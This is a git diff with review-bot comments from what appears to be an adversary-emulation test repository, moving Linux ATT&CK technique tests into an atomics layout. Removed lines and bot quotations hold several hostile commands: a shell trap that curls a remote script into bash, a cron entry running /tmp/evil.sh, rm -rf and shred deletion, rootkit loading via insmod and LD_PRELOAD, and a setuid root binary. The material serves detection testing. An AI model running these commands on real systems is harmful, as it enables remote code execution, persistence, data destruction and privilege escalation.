diff --git a/Linux/Defense_Evasion/File_Deletion.md b/Linux/Defense_Evasion/File_Deletion.md
deleted file mode 100644
index c364bd5e..00000000
--- a/Linux/Defense_Evasion/File_Deletion.md
+++ /dev/null
@@ -1,23 +0,0 @@
-## File Deletion
-
-MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
-
-### Victim Configuration
-
- echo "This file will be shredded" > /tmp/victim-shred.txt
- mkdir /tmp/victim-files
- cd /tmp/victim-files
- touch a b c d e f g
-
-### Delete a single file
-
- rm -f /tmp/victim-files/a
-
-### Delete an entire folder
-
- rm -rf /tmp/victim-files
-
-### Overwrite and delete a file with shred
-
- shred -u /tmp/victim-shred.txt
-
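Review bot: the `shred -u` overwrite-and-delete test is dropped here with no replacement visible anywhere in this patch. The index hunks later in the change list `T1070 Indicator Removal on Host - Atomic Test #3: rm -rf [macos, linux]`, which covers the `rm -rf` case, but nothing covers `shred`, so the secure-deletion coverage (and the detection opportunity it exercises) is lost unless a test already exists under `atomics/`. Suggest migrating `shred -u /tmp/victim-shred.txt` together with its `echo "This file will be shredded" > /tmp/victim-shred.txt` setup into the corresponding atomics yaml before deleting this file, or saying in the commit message that it was dropped on purpose.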
diff --git a/Linux/Defense_Evasion/Rootkits.md b/Linux/Defense_Evasion/Rootkits.md
deleted file mode 100644
index 06becd24..00000000
--- a/Linux/Defense_Evasion/Rootkits.md
+++ /dev/null
@@ -1,21 +0,0 @@
-## Rootkits
-
-MITRE ATT&CK Technique: [T1014](https://attack.mitre.org/wiki/Technique/T1014)
-
-### Loadable Kernel Module based Rootkit
-
-Input:
-
- sudo insmod MODULE.ko
-
-OR
-
-Input:
-
- sudo modprobe MODULE.ko
-
-### LD_PRELOAD based Rootkit
-
-Input:
-
- export LD_PRELOAD=$PWD/libmy_r00tkit.so
\ No newline at end of file
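Review bot: neither the loadable-kernel-module test nor the `LD_PRELOAD` test deleted here reappears elsewhere in this patch, and the index context lines still point `T1215 Kernel Modules and Extensions` at `CONTRIBUTIONS.md`, i.e. there is no atomics test for this yet; confirm the migration exists before removing the file. If the content is carried over, keep only the `sudo insmod MODULE.ko` form: the removed `sudo modprobe MODULE.ko` line was never correct, since `modprobe` resolves a module name through the installed modules tree rather than loading a `.ko` path. The missing trailing newline on the old file is harmless but worth fixing in the migrated copy.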
diff --git a/Linux/Lateral_Movement/Remote_File_Copy.md b/Linux/Lateral_Movement/Remote_File_Copy.md
deleted file mode 100644
index 288f77db..00000000
--- a/Linux/Lateral_Movement/Remote_File_Copy.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Remote File Copy
-
-MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
-
-## Adversary System Configuration
-### Ensure SSH access has been configured for an adversary account
- echo "This file transferred by scp" > /tmp/adversary-scp
- echo "This file transferred by sftp" > /tmp/adversary-sftp
- mkdir /tmp/adversary-rsync
- cd /tmp/adversary-rsync
- touch a b c d e f g
-
-## Victim System Configuration
-### Ensure SSH access has been configured for a victim account
-### Ensure write access for victim account to this directory
- mkdir /tmp/victim-files
- cd /tmp/victim-files
-
-## Push files to victim using rsync
- rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
-
-## Pull files from adversary using rsync
- rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
-
-## Push files to victim using scp
- scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
-
-## Pull file from adversary using scp
- scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
-
-## Push files to victim using sftp
- sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
-
-## Pull file from adversary using sftp
- sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
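Review bot: the T1105 rsync/scp/sftp tests are deleted with no corresponding `atomics/T1105` change in this patch and no T1105 line in any of the index hunks, so the lateral-movement coverage disappears. If they are migrated, two things to carry over: `sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'` relies on a bash here-string and `$'...'` quoting, so the migrated executor must be `bash`, not `sh`; and the prerequisites spelled out in the old headings (SSH access for both the adversary and victim accounts, write access to `/tmp/victim-files`) belong in the test description, since the index lines do not capture them.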
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
deleted file mode 100644
index 3550fb8c..00000000
--- a/Linux/Persistence/Browser_Extensions.md
+++ /dev/null
@@ -1,24 +0,0 @@
-## Browser Extensions
-
-MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
-
-
-### Chrome (Developer Mode)
-
-Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
-
-Then click 'Select'
-
-### Chrome (Chrome Web Store)
-
-Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
-
-### Firefox
-
-Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
-
-Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
-
-Then click 'Open'
\ No newline at end of file
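Review bot: the Chrome variants deleted here are accounted for (the index hunks list `T1176` Atomic Test #1 Chrome (Developer Mode) and #2 Chrome (Chrome Web Store) for linux), but the Firefox `about:debugging` / "Load Temporary Add-on" variant does not appear in the visible index context. Please confirm it exists under `atomics/T1176` before this file goes; otherwise the Firefox coverage is silently lost.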
diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md
deleted file mode 100644
index 09435f6a..00000000
--- a/Linux/Persistence/Cron_Job.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# Cron Job
-
-MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
-
-
- echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
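Review bot: this deletion is covered (linux-index shows `T1168 Local Job Scheduling - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]`), but one caveat the old one-liner never stated should go into the migrated test's description: `crontab /tmp/persistevil` replaces the invoking user's entire crontab rather than appending to it. The test should save the existing crontab first (`crontab -l > /tmp/crontab.bak`) and restore it in cleanup, or at least warn that running it on a host with real cron entries destroys them.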
diff --git a/Linux/Persistence/Hidden_Files_and_Directories.md b/Linux/Persistence/Hidden_Files_and_Directories.md
deleted file mode 100644
index 7a9100aa..00000000
--- a/Linux/Persistence/Hidden_Files_and_Directories.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Hidden Files and Directories
-
-MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
-
-To create visible directories and files
-
- mkdir visible-directory
- echo "this file is visible" > visible-directory/visible-file
-
- # List the contents the current directory and visible directory
- ls
- ls visible-directory
-
-
-To create hidden directories and files
-
- mkdir .hidden-directory
- echo "this file is hidden" > .hidden-directory/.hidden-file
-
- # List the contents the current directory and hidden directory
- ls -la
- ls -la .hidden-directory
\ No newline at end of file
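Review bot: the content moves to T1158 tests #7 and #8 in this same patch, but the two explanatory comments (`# List the contents the current directory and visible directory` and its hidden-directory twin) were dropped in the move, leaving the new tests with `xxx` descriptions and no statement of what comparing `ls` with `ls -la` is meant to show. Suggest reusing them, corrected to "List the contents of the current directory and the visible/hidden directory", as the descriptions of the new tests.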
diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md
deleted file mode 100644
index cc3a46f4..00000000
--- a/Linux/Persistence/Trap.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Trap
-
-MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
-
-
- trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
-
- exit
-
-After exiting the shell, the script will download and execute.
\ No newline at end of file
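Review bot: the T1154 `trap ... EXIT` test is removed with nothing in this patch replacing it and no T1154 entry in the visible index context; confirm a migrated copy exists under `atomics/T1154`. The payload URL also hard-codes `master/Linux/Payloads/echo-art-fish.sh`, and this patch is removing files under `Linux/`, so check that `Linux/Payloads/echo-art-fish.sh` survives the reorganization; if it does not, the migrated test fetches a 404 and the "After exiting the shell, the script will download and execute" claim stops being true.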
diff --git a/Linux/Persistence/bash_profile_and_bashrc.md b/Linux/Persistence/bash_profile_and_bashrc.md
deleted file mode 100644
index c09c8a1f..00000000
--- a/Linux/Persistence/bash_profile_and_bashrc.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# .bash_profile and .bashrc
-
-MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
-
- echo "/path/to/script.py" >> ~/.bash_profile
- echo "/path/to/script.py" >> ~/.bashrc
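Review bot: this deletion is matched by the T1156 platform change later in the patch, so nothing is lost. One detail the old file made explicit and the atomics copy should keep: the script path is appended to both `~/.bash_profile` and `~/.bashrc`, so cleanup has to strip the line from both files, and a detection check (file-integrity monitoring on both dotfiles) should watch both as well.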
diff --git a/Linux/Privilege_Escalation/Setuid_and_Setgid.md b/Linux/Privilege_Escalation/Setuid_and_Setgid.md
deleted file mode 100644
index e785a5d2..00000000
--- a/Linux/Privilege_Escalation/Setuid_and_Setgid.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# Setuid and Setgid
-
-MITRE ATT&CK Technique: [T1166](https://attack.mitre.org/wiki/Technique/T1166)
-
-Navigate to [hello.c](../Payloads/hello.c)
-
-Input:
-
- make hello
-
- sudo chown root hello
-
- sudo chmod u+s hello
-
- ./hello
\ No newline at end of file
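Review bot: the T1166 setuid test is removed with nothing in the patch replacing it and no T1166 line in the index hunks; confirm the migration before merging. If it is carried over, the test needs to state its prerequisites (`hello.c` from `../Payloads/` and a working `make`) and that `sudo chown root hello` followed by `sudo chmod u+s hello` leaves a root-owned setuid binary on disk, so cleanup (`rm hello`) is mandatory rather than optional; a `find / -perm -4000` style check is the natural detection validation for this one.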
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 5a5f8439..3dbda9a2 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
@@ -24,7 +24,7 @@ Permissions Required: User, Administrator
## Atomic Test #1 - .bash_profile and .bashrc
xxx
-**Supported Platforms:** macOS
+**Supported Platforms:** macOS, Linux
#### Inputs
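Review bot: the description line just above the changed line is still the `xxx` placeholder, and declaring Linux support without saying when the modification fires will confuse testers: `~/.bash_profile` is read by login shells and `~/.bashrc` by interactive non-login shells, so on Linux the tester has to open the right kind of shell to see the persistence trigger. Suggest replacing `xxx` with that one sentence and a note that both files are modified.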
diff --git a/atomics/T1156/T1156.yaml b/atomics/T1156/T1156.yaml
index a9fdaf14..48dd19fa 100644
--- a/atomics/T1156/T1156.yaml
+++ b/atomics/T1156/T1156.yaml
@@ -9,6 +9,7 @@ atomic_tests:
supported_platforms:
- macos
+ - linux
input_arguments:
script:
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index 988733be..8e8314bd 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -41,6 +41,10 @@ Permissions Required: User
- [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)
+- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
+
+- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
+
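Review bot: each of the two new TOC entries is followed by an extra empty `+` line, unlike the existing entry in context, and the capitalisation is inconsistent between `Create visible Directories` and `Create hidden directories and files`. Suggest `Create visible directories` (the anchor `#atomic-test-7---create-visible-directories` is already lowercase, so the link does not change) and dropping the extra blank lines.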
@@ -127,3 +131,35 @@ xxx
defaults write com.apple.finder AppleShowAllFiles YES
```
+
+
+## Atomic Test #7 - Create visible Directories
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir visible-directory
+echo "this file is visible" > visible-directory/visible-file
+ls
+ls visible-directory
+```
+
+
+
+## Atomic Test #8 - Create hidden directories and files
+xxx
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+mkdir .hidden-directory
+echo "this file is hidden" > .hidden-directory/.hidden-file
+ls -la
+ls -la .hidden-directory
+```
+
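Review bot: both new tests ship with `xxx` as their description and have no cleanup, so a second run fails at `mkdir visible-directory` / `mkdir .hidden-directory` with "File exists". Suggest `mkdir -p`, a cleanup step (`rm -rf visible-directory .hidden-directory`), and real descriptions: #7 is the visible control case and #8 is the technique, and the thing `ls -la` demonstrates is that a leading dot only hides an entry from a plain `ls`, not from `ls -a`, `find`, or file-integrity and audit tooling, which is the detection point worth stating.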
diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml
index adf48593..95fdc5b3 100644
--- a/atomics/T1158/T1158.yaml
+++ b/atomics/T1158/T1158.yaml
@@ -84,3 +84,35 @@ atomic_tests:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
+
+- name: Create visible Directories
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir visible-directory
+ echo "this file is visible" > visible-directory/visible-file
+ ls
+ ls visible-directory
+
+- name: Create hidden directories and files
+ description: |
+ xxx
+
+ supported_platforms:
+ - macos
+ - linux
+
+ executor:
+ name: sh
+ command: |
+ mkdir .hidden-directory
+ echo "this file is hidden" > .hidden-directory/.hidden-file
+ ls -la
+ ls -la .hidden-directory
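Review bot: same issues as the markdown copy: `description: xxx` placeholders, no cleanup, and `mkdir` without `-p`. In addition the commands run in whatever directory the executor is invoked from, so the directories land in the runner's cwd; prefer an explicit location (for example under `/tmp`) so cleanup and detection validation know where to look, and keep the `.md` and `.yaml` command blocks identical once either is changed.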
diff --git a/atomics/index.md b/atomics/index.md
index 4af93d2a..0bf6845b 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -1,7 +1,7 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1015 Accessibility Features](./T1015/T1015.md)
- Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
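Review bot: the `CONTRIBUTIONS.md` placeholder links in the context lines (here `T1182 AppCert DLLs`, and the same pattern throughout the other index hunks) point at the `uppercase-everything` branch, which will 404 once that branch is deleted; the index generator should emit links against a stable branch. The platform tag update itself is consistent with the T1156 yaml change.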
@@ -37,6 +37,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1179 Hooking](./T1179/T1179.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1062 Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
@@ -167,6 +169,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1147 Hidden Users](./T1147/T1147.md)
- Atomic Test #1: Hidden Users [macos]
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 1eeb45d1..4f199149 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -1,6 +1,7 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1067 Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -11,6 +12,8 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
@@ -128,6 +131,8 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
- Atomic Test #3: rm -rf [macos, linux]
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 5c0868e6..226b96b4 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -1,7 +1,7 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- - Atomic Test #1: .bash_profile and .bashrc [macos]
+ - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -16,6 +16,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1215 Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1161 LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1159 Launch Agent](./T1159/T1159.md)
@@ -190,6 +192,8 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
+ - Atomic Test #7: Create visible Directories [macos, linux]
+ - Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1147 Hidden Users](./T1147/T1147.md)
- Atomic Test #1: Hidden Users [macos]
- [T1143 Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)